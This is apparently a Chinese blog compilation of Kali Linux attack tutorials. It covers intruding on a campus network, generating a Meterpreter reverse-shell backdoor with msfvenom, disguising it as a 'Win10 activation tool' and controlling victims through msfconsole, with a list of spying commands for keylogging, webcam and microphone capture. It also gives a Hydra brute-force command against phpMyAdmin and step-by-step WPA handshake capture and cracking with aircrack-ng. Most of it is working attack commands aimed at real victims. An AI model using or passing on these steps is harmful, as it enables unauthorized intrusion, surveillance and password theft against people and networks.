虚拟机内kali怎样攻击校园网
首先你的kali得进入学校的局域网,然后用nmap 扫描存活的主机。
接着就是针对存在的服务漏洞进行攻击,获取权限后上传后门,以便维持访问。
然后就是。。。向你的舍友炫耀了。。。
最后就是。。。你好:我是查水表的,能开一下门吗?
Kali利用msf渗透Windows电脑(超详细)
前言
最近整理了一些 奇安信华为深信服大佬 的课件资料+大厂面试课题,想要的可以私信自取, 无偿赠送 给粉丝朋友~
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
演示环境
使用Kali 2021.3进行演示操作
目标靶机: Win10专业版
软件:msfvenom、msfconsole(Kali系统内置)
1.进入管理员模式
命令: sudo su
解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令
命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口号 –f exe –o 文件名.exe
解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址
本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就性
文件名可以随便写自己喜欢的名字,比如写Win10激活工具,可能更容易让目标主机上钩
当然MSF也可以用来渗透手机、mac、Linux等
接下来运行命令生成文件
默认生成的文件在根目录下
把刚才生成的文件放到目标靶机Win10系统中
命令: msfconsole
(1)命令: use exploit/multi/handler(选择模块)
(2)命令: set payload windows/meterpreter/reverse_tcp(选择攻击模块)
(3)命令: set LhOST 192.168.32.1(填写自己主机的IP地址)
(4)命令: set lport 1111(填写刚才生成文件时的端口号)
(5)命令: show options(查看设置参数)
(6)命令: exploit -z -j(后台执行)
我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面
(1)命令: sessions (查看上钩的用户)
(2)命令: sessions -i 1 (选择需要攻击的用户,这里选择第 1 个
命令: run vnc -i
cmd指令:
cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件(ls 的别名)
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程
keyscan_start 开始捕获击键(开始键盘记录)
keyscan_dump 转储按键缓冲(下载键盘记录)
keyscan_stop 停止捕获击键(停止键盘记录)
record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat 开始视频聊天(视频,对方会有弹窗)
webcam_list 单摄像头(查看摄像头列表)
webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出 *** 摄像头
webcam_snap 从指定的 *** 摄像头拍摄快照
webcam_stream 播放来自指定 *** 摄像头的视频流
play 在目标系统上播放波形音频文件 (.wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本
————————————————
原文链接:
如何通过kali linux入侵网站
入侵检测系统的核心价值在于通过对全网信息的分析,了解信息系统的安全状况,进而指导信息系统安全建设目标以及安全策略的确立和调整,而入侵防御系统的核心价值在于安全策略的实施—对黑客行为的阻击;入侵检测系统需要部署在 *** 内部,监控范围可以覆盖整个子网,包括来自外部的数据以及内部终端之间传输的数据,入侵防御系统则必须部署在 *** 边界,抵御来自外部的入侵,对内部攻击行为无能为力。
使用kali Hydra暴力破解phpadmin网站(失败)
一个没有保护措施的phpadmin后台。
在github上找到字典,或者使用kali自带字典
用burp抓包后找到url和错误信息,按照hydra的语法写下语句
有一个困扰了很久的点是,最开始的一遍扫描成功不了,原因是只写了ip没有改端口。导致其实一直在扫一个404页面。
-s选项可以更改端口。
最终命令:
hydra -L Top20_Admin_Users.txt -P FastPwds.txt -V -t 4 -e ns -f -s 88 xx.xx.xx.xx http-post-form "/xxx:xxx=^USER^xxx=^PASS^server=1token=2bbde9ea85a0ac2da88dd37a84c63d57:#1045 Cannot log in to the MySQL server"
很奇怪的是每一个测试都成功了,使用 *** 后检测才发现发出去的request很奇怪导致获取不了正确的包。
改用burpsuite,在参考别人文章后安装破解版burpsuite,发现这个东西用来web攻击很好用。
phpmyadmin有一个防御机制,发送之一个包到后台后,会重新发送一个get请求,在cookie里面带上加密的username和password。解决 *** 没找到。最终破解失败。
有任何问题可以私信我。
Kali系统使用Aircrack-ng进行暴力破解WIFI密码
Aircrack-ng是一个与802.11标准的无线 *** 分析有关的安全软件,主要功能有: *** 侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站)并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。Linux版本已经被移植到了Zaurus和Maemo系统平台, 并概念验证可移植到iPhone。
使用Kali 2021.3进行演示操作
软件: aircrack-ng (Kali系统内置)
外置无线网卡设备: 要支持监听,支持Linux并且免驱(我这里使用的是RT3070)
命令: codesudo su/code
解释: 不在管理员模式下运行可能会有权限不够的提示
命令: codeiwconfig/ifconfig/code
解释: iwconfig查看网卡的信息、ifconfig查看新连接的设备
wlan0就是我们的无线网卡
命令: codeairmon-ng check kill/code
解释: 杀死进程可以让搜索更准确,不会受到影响
命令: codeairmon-ng/code
出现你的网卡信息就说明你的网卡支持监听
命令: codeairmon-ng start wlan0/code
解释: start 开启哪个接口 wlan0 是接口的名字
再用iwconfig查看一下网卡信息,wlan0后面多了个mon,wlan0mon就说明已经开启监听了
命令: codeairodump-ng wlan0mon/code
解释: BSSID:WIFI的MAC地址、PWR:信号强度(值越小信号强度强)、Data:监听期间流量总合、CH:信道、ENC:加密算法、ESSID:WIFI名称
命令: codeairodump-ng -c (频道号) --bssid (MAC地址) -w (抓取的数据包的保存位置) wlan0mon/code
解释:
我要破解的目标 *** 是Test,CH(信道)是11,MAC地址是E2:D4:64:02:73:A8,我在根目录下创建了一个名为1的文件夹
输入命令: airodump-ng -c 11 --bssid E2:D4:64:02:73:A8 -w 1/ wlan0mon
当新的客户端连接时,客户端输入密码连接就可以抓到握手包,右上角出现WPA时就表示已经抓到了对方的握手包
命令: codeaireplay-ng -o 2 -a BSSID(MAC地址) -c STATION wlan0mon/code
解释:
执行命令codeaireplay-ng -o 2 -a E2:D4:64:02:73:A8 -c C8:94:02:6D:93:F3 wlan0mon/code
捕捉到握手包时就停止攻击
命令: codeaircrack-ng -a2 -b E2:D4:64:02:73:A8 -w 字典.txt 1/-01.cap/code
解释:
最后就是等待跑字典了,下面就是破解的WIFI密码
命令: codeairmon-ng stop wlan0mon/code
在监听模式下,kali不能连接 ***
插入网卡,如果查看不到网卡信息,可以点开连接WIFI看一下能否搜索到附近的 *** ,如果不行那就右键系统可移动设备-把网卡断开再重新连接一下
插入网卡,打开网卡的监听模式,搜索附近的WIFI,获取握手包,最后跑字典破解握手包,这里给大家提供一个常用的密码字典
kali裸机有什么缺点?
Kali Linux 是一种基于 Debian 的 Linux 发行版,专注于渗透测试和 *** 安全。Kali Linux 裸机的缺点主要有以下几点:
安全性较低:因为 Kali Linux 集成了大量渗透测试工具和漏洞,如果不加以安全配置,可能会被黑客攻击。
不适合日常使用:Kali Linux 主要针对安全测试,不适合作为日常使用的操作系统。
驱动支持较差:Kali Linux 集成的驱动支持较为有限,可能需要手动安装或编译驱动程序,对于不熟悉 Linux 的用户来说比较困难。
不稳定:由于 Kali Linux 的定位是测试,因此可能存在一些未知的 Bug 和问题,使用过程中可能会出现一些异常情况。
综上所述,Kali Linux 裸机并不适合作为日常使用的操作系统,而更适合于 *** 安全专业人士和渗透测试人员使用。
0条大神的评论